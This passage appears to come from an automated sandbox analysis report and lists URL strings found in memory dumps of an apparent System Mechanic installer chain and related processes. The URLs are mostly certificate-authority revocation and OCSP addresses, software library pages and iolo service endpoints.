                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://download.iolo.net
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
                                Source: run.exe, run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://google.com
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025AB000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                                Source: u42w.3.exe, 00000005.00000003.2038133988.0000000002674000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025D6000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002639000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/CompositeWPF
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/prism
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
